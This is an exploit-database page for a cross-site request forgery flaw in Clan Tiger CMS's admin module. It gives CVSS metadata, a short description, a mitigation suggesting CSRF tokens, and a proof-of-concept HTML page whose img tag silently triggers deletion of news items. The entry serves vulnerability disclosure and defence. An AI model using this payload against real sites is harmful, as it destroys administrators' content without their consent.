header-logo
Suggest Exploit
vendor:
Clan Tiger_CMS
by:
Pratul Agrawal
8,8
CVSS
HIGH
Cross Site Request Forgery (CSRF)
352
CWE
Product Name: Clan Tiger_CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: clantiger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Clain_TIger_CMS CSRF Vulnerability

A vulnerability was found in the Admin module of Clan Tiger_CMS. An attacker can delete the News content by sending a malicious request to the targeted URL. After execution, the content is deleted automatically.

Mitigation:

Implementing a CSRF token in the application can help prevent CSRF attacks.
Source

Exploit-DB raw data:

=======================================================================
   
                   Clain_TIger_CMS CSRF Vulnerability
 
                                =======================================================================

  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Software      Clan Tiger_CMS
  # Category  	  CMS / Portals
  # Site p4ge     http://server/clantiger/index.php?module=login
  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://servername/clantiger/
  
 
   Script to Delete the News content through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>
 
                          <body>
 
                              <img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />
 
                          </body>
 
                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.

Navigation

Suggest Exploit

Services By CQR